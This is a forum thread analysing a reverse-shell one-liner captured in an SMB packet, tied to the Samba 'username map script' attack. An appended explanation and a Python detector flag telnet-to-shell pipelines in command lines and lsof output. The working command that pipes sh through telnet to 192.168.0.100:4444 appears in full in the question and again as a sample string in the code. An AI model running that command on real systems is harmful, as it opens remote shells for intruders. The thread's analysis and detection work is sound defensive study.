SMB shell script

caesar

Guest
Hi,

I found this script in an SMB packet in pcap capture.

Can anyone tell me what exactly this code does?

`nohup sh -c '(sleep 3807|telnet 192.168.0.100 4444|while : ; do sh && break; done 2>&1|telnet 192.168.0.100 4444 >/dev/null 2>&1 &)'`
 
It appears to be spawning numerous shell processes and initiating telnet sessions on port 4444. nohup runs commands immune to hangups.

More port info is available here http://www.speedguide.net/port.php?port=4444

Check the results of `lsof -i` to see if you have telnet sessions going.

I'm no intrusion expert, but IMHO this appears to be a hack.
 
Actually it is a hypothetical attack.

But why do you think it is spawning numerous shells? I mean, there is "&& break".
Doesn't it mean: spawn one sh and, if it has been successfully spawned, break out of the while?

what about the sleep, what's the need for it?
 
> doesn't it mean: spawn one sh and if it has been successfully spawned break out the while??

That does seem to be what it's doing. I tried it and got two telnet connection attempts.

> what about the sleep, what's the need for it?

That's confusing, especially the 3807 second delay time, which would be just over an hour.

Another confusing aspect is the private ip address. Where is it attempting to connect?
 
Man, I got it.
As I told you, this is a hypothetical attack that needs to be analyzed.
The attack can be found here: [oops, I can't post links]!!!
You can Google "Samba "username map script" Command Execution".
Thanks for your input.
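For readers triaging a capture like this one, the pipeline reads as follows: `sleep 3807` produces no output but keeps the first telnet's stdin open for about an hour so the connection does not close on EOF; whatever arrives on that first connection is piped into the `while` loop, where `sh` reads it as commands; the shell's output (stdout and stderr, via `2>&1`) is piped into a second telnet to the same host and port. That is why two connection attempts to 192.168.0.100:4444 show up, and why the loop normally runs `sh` only once. The script below is an added example (not code from the thread, from Samba, or from the exploit module mentioned) that flags command lines in which a telnet socket is wired to an interpreter, extracts the remote endpoint and the keep-alive delay, notes whether the endpoint is a private address (the puzzle raised above), and parses `lsof -i` output for matching telnet sessions. The command line and the `lsof -i` output used as input are constructed for the demonstration; the `analyze_command` and `telnet_sessions` names are hypothetical.

```python
"""Triage helpers for the telnet-piped shell one-liner discussed in the thread.

Added example code, not from the forum, Samba, or any exploit module.
The sample command line and lsof output below are constructed for the demo.
"""
import ipaddress
import re
from typing import List, NamedTuple, Optional


class ReverseShellHit(NamedTuple):
    host: str              # remote endpoint the shell is wired to
    port: int
    shell: str             # interpreter whose stdin/stdout is tied to telnet
    delay: Optional[int]   # argument of a 'sleep N' keeping the socket open, if any
    private_host: bool     # True for RFC 1918 / loopback / link-local endpoints


class Session(NamedTuple):
    command: str
    pid: int
    remote_host: str
    remote_port: int
    state: str


TELNET_RE = re.compile(r'\btelnet\s+([0-9.]+)\s+(\d{1,5})\b')
SHELL_RE = re.compile(r'(?:^|[\s;(])(sh|bash|dash|ash|zsh)\b')
SLEEP_RE = re.compile(r'\bsleep\s+(\d+)\b')
# lsof -i NAME column for a TCP connection, e.g. "TCP a:1->b:2 (ESTABLISHED)"
LSOF_TCP_RE = re.compile(r'TCP\s+\S+->([0-9.]+):(\d+)\s+\((\w+)\)')


def _stages(cmd: str) -> List[str]:
    """Split a command line into pipeline stages on '|'. Quoting is ignored,
    which is good enough for triage of a one-liner like the one in the thread."""
    return [s.strip() for s in cmd.split('|')]


def analyze_command(cmd: str) -> Optional[ReverseShellHit]:
    """Flag a command when a telnet stage is directly piped into, or fed by,
    a shell stage, i.e. the network socket is wired to an interpreter."""
    stages = _stages(cmd)
    for i, stage in enumerate(stages):
        m = TELNET_RE.search(stage)
        if not m:
            continue
        host, port = m.group(1), int(m.group(2))
        # Check the stage that reads telnet's output first, then the one feeding it.
        neighbours = stages[i + 1:i + 2] + stages[i - 1:i]
        for nb in neighbours:
            sm = SHELL_RE.search(nb)
            if sm:
                dm = SLEEP_RE.search(cmd)
                delay = int(dm.group(1)) if dm else None
                try:
                    private = ipaddress.ip_address(host).is_private
                except ValueError:
                    private = False
                return ReverseShellHit(host, port, sm.group(1), delay, private)
    return None


def telnet_sessions(lsof_output: str, port: Optional[int] = None) -> List[Session]:
    """Pick telnet TCP connections out of 'lsof -i' output, optionally
    restricted to one remote port (e.g. the 4444 seen in the capture)."""
    hits = []
    for line in lsof_output.splitlines():
        fields = line.split()
        if len(fields) < 9 or fields[0] != 'telnet':
            continue
        m = LSOF_TCP_RE.search(line)
        if not m:
            continue
        rport = int(m.group(2))
        if port is not None and rport != port:
            continue
        hits.append(Session(fields[0], int(fields[1]), m.group(1), rport, m.group(3)))
    return hits


# Constructed sample: the one-liner from the capture, as quoted in the thread.
SAMPLE_CMD = ("nohup sh -c '(sleep 3807|telnet 192.168.0.100 4444|"
              "while : ; do sh && break; done 2>&1|"
              "telnet 192.168.0.100 4444 >/dev/null 2>&1 &)'")

# Constructed sample 'lsof -i' output from a host where the script ran.
SAMPLE_LSOF = """\
COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
sshd      812 root    3u  IPv4  10234      0t0  TCP *:22 (LISTEN)
telnet   4021 root    3u  IPv4  15677      0t0  TCP 192.168.0.55:40112->192.168.0.100:4444 (ESTABLISHED)
telnet   4023 root    3u  IPv4  15680      0t0  TCP 192.168.0.55:40113->192.168.0.100:4444 (SYN_SENT)
"""

if __name__ == '__main__':
    print(analyze_command(SAMPLE_CMD))
    for s in telnet_sessions(SAMPLE_LSOF, port=4444):
        print(s)
```

`analyze_command` deliberately reports only the stage adjacent to the telnet socket, so the outer `sh -c` wrapper is not mistaken for the interpreter; the hit for the thread's command names `sh` inside the `while` loop, the 3807-second delay, and a private endpoint, which on a real host would point to a listener on the local network rather than an Internet address. `telnet_sessions` returns both connections (one established, one still connecting), matching the two attempts reported above.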
 